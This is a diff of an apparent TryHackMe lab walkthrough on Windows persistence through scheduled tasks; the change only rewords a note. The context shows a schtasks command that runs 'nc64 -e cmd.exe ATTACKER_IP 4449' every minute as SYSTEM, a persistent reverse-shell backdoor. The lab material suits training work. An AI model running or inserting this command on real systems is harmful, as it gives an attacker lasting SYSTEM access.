SudoArnab00/TryHackMe-Walkthroughs/Folder-Windows-Local-Persistence/Windows-Local-Persistence-AbusingScheduledTasks.md

 - Create a task that runs every minute
 `schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM`

-**Note**: keep the name "THM-TaskBackdoor" intact, dont change it else the flag done be retrieved The script is scheduled to run with SYSTEM privileges
+**Note**: keep the name "THM-TaskBackdoor" intact, do not change it, else the flag won't be retrieved

+The script is scheduled to run with SYSTEM privileges

 - Check for the schedule